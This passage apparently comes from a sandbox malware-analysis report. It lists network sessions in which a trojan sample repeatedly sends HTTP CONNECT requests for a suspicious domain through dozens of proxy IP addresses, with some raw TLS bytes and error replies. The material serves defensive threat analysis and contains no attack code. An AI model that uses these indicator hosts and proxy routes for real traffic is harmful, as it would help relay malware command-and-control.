                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492217064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                611192.168.2.851910125.19.99.9041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.321882963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                612192.168.2.85047547.74.152.2988885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.334836006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                613192.168.2.85199120.44.190.15031295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.343101025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.608088017 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                614192.168.2.851529192.111.139.163194045828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.344957113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                615192.168.2.85198335.72.118.126805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.352679014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.639034986 CET196INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: Servlet/2.4
                                                                                Server: Oracle-Application-Server-10g/9.0.4.1.0 Oracle-HTTP-Server
                                                                                Content-Length: 0
                                                                                Feb 23, 2024 14:28:26.639427900 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 79 95 9e 0f 19 b8 3b 43 4c a2 6c 2c bc 59 44 8a 44 5b 90 b1 f7 3c 9c 19 4a cf 38 94 72 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: ey;CLl,YDD[<J8r*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#$lHWvW}gyf!0IDL\
                                                                                Feb 23, 2024 14:28:26.923521996 CET1129INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 dd ea 32 26 6e a7 b7 01 8c 55 c1 45 76 6d 14 55 56 65 35 91 a5 9a 57 3d 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                Data Ascii: =92&nUEvmUVe5W=DOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223124521Z260222124521Z03110/U(heygirlisheeverythingyouwantedinaman.c
                                                                                Feb 23, 2024 14:28:27.166126013 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 77 64 5e 27 8a 05 af 55 33 26 3b 51 a1 74 b0 07 fa 07 09 c5 cf df c9 29 01 55 01 f8 72 7f e9 5b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b0 1f f4 00 e6 49 7b e8 ad 48 4e ec 3f 31 f6 e5 43 b2 74 02 ce
                                                                                Data Ascii: %! wd^'U3&;Qt)Ur[(I{HN?1CtRw*Ac>
                                                                                Feb 23, 2024 14:28:27.444988966 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 c1 27 6c f7 83 b9 b6 12 ca 37 5f cd 50 ed 66 06 e5 0e 3f 38 62 6f 6c 9a f4 62 2f 05 48 99 81 c1 c5 9d 96 1f 88 e5 84 0c
                                                                                Data Ascii: ('l7_Pf?8bolb/H


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                616192.168.2.852049200.111.182.64435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.352864027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                617192.168.2.851924102.132.57.9080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.352984905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                618192.168.2.852052200.111.182.64435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.354757071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                619192.168.2.852053200.111.182.64435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.355870008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                620192.168.2.85197658.234.116.19781975828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.364075899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                621192.168.2.851901113.204.4.142108005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.364075899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                622192.168.2.851965186.156.161.23531285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.364595890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                623192.168.2.851953154.236.176.2819815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.366879940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.179141998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.195091963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.195043087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.992062092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.695087910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.382852077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.694848061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:03.288439989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                624192.168.2.851946104.248.151.220597555828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.371496916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.179203033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.195077896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.195086956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.195101976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.179493904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                625192.168.2.852060200.111.182.64435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.380836964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                626192.168.2.85201872.210.221.19741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.381424904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                627192.168.2.851960171.248.213.12110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.382049084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                628192.168.2.851987115.74.159.3910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.409544945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                629192.168.2.851996171.247.98.9010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.416384935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                630192.168.2.85210591.231.186.1334435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.418004990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                631192.168.2.851990103.148.51.1980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.436587095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                632192.168.2.852074172.67.200.220805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.506668091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.594845057 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                633192.168.2.852031109.107.181.245325785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.506675005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                634192.168.2.850802167.99.123.158489535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.506788015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.694807053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.695116997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.753187895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.882328987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:02.882201910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:14.917788029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                635192.168.2.85171392.204.134.38153935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.506795883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.694808960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.695084095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.753206015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.882385015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:02.882452011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:14.916918039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                636192.168.2.852078162.159.242.252805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.507164001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.595180988 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                637192.168.2.850771172.93.213.177805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.508200884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.703708887 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.22.1
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                638192.168.2.85204865.49.82.7319775828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.508795023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.991724968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.492300987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.491885900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.382595062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                639192.168.2.852016211.222.252.187805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.509376049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                640192.168.2.85162234.92.12.21092385828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.513406992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.565543890 CET28INHTTP/1.1 502 Bad Gateway


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                641192.168.2.852010210.211.113.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.513571978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                642192.168.2.85205147.180.63.37543215828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.521250963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                643192.168.2.85201743.131.245.216156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.528611898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                644192.168.2.852132172.67.35.15805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
